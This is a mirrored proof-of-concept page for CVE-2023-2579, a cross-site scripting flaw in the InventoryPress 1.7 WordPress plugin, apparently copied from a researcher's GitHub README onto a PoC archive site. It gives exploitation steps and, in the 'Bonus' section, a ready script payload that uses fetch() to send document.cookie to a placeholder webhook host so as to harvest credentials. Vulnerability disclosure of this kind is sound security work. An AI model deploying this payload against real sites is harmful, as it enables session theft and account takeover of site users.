Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-2579 PoC — InventoryPress <= 1.7 - Author+ Stored XSS

Source
https://github.com/0xn4d/poc-cve-xss-inventory-press-plugin
Associated Vulnerability
Title:InventoryPress <= 1.7 - Author+ Stored XSS (CVE-2023-2579)
Description:The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.
Description
PoC for CVE-2023-2579
Readme
# Update - 6-23-2023
The CVE-2023-2579 ID was reserved and the PoC was published in the WPScan website: 
https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe

# Details

Title: Authenticated Reflected Cross-Site Scripting in InventoryPress Plugin for WordPress CMS</br>
Date: 2023-04-21</br>
Author: Danilo Albuquerque</br>
Vendor Homepage: https://wordpress.org</br>
Software Link: https://wordpress.org/download</br>
Version: WordPress 6.2</br>
Plugin's Name and Version: InventoryPress 1.7</br>
Tested on: Brave (Version 1.50.119  Chromium: 112.0.5615.121 (Official Version)  64 bits)</br>

# PoC for Reflected XSS vulnerability in InventoryPress 1.7

1. Go to the page that you can add the items into the inventory;
2. Add the malicious payload into the "Description" input of the form;
3. Access the new item's link generated by the plugin;

When you do all that and update the current page, it will bring you the alert pop-up with the message in it.

## Screenshots below

1. Go to the page that you can add the items into the inventory:</br>
![image](https://user-images.githubusercontent.com/85083396/233687800-41ba730b-50e1-45eb-a105-9e88d0335f4f.png)

2. Add the malicious payload into the "Description" input of the form:</br>
![image](https://user-images.githubusercontent.com/85083396/233688168-6c750d25-dd8a-41de-abec-81eae96423da.png)

3. Access the new item's link generated by the plugin:</br>
![image](https://user-images.githubusercontent.com/85083396/233688283-3220817f-038d-489a-8618-2c534c9aa4a0.png)

4. Once the request is done, the alert pop-up is showed:</br>
![image](https://user-images.githubusercontent.com/85083396/233688698-da57fe00-2f4a-4d85-bf23-d89dfc36d5cd.png)

# Bonus - PoC for Stored XSS

1. Add the following payload to steal the cookies into the "Description" input: ```<script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>```. Then post the new item, or update an old one;
2. Trigger and get the credentials in the Webhook site

1. Adding the payload and posting the item (or updating it):
![image](https://user-images.githubusercontent.com/85083396/233690179-2e788617-ac38-4afa-a5b8-6a546c3bed1d.png)

2. Triggering and getting the credentials:
![image](https://user-images.githubusercontent.com/85083396/233690648-a72abe8d-889a-4019-bc1f-72f466e87a90.png)
File Snapshot

 [4.0K]  /data/pocs/b2e020c33ba34cb1cf111c1c9c7e203ee5d3974b
└── [2.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →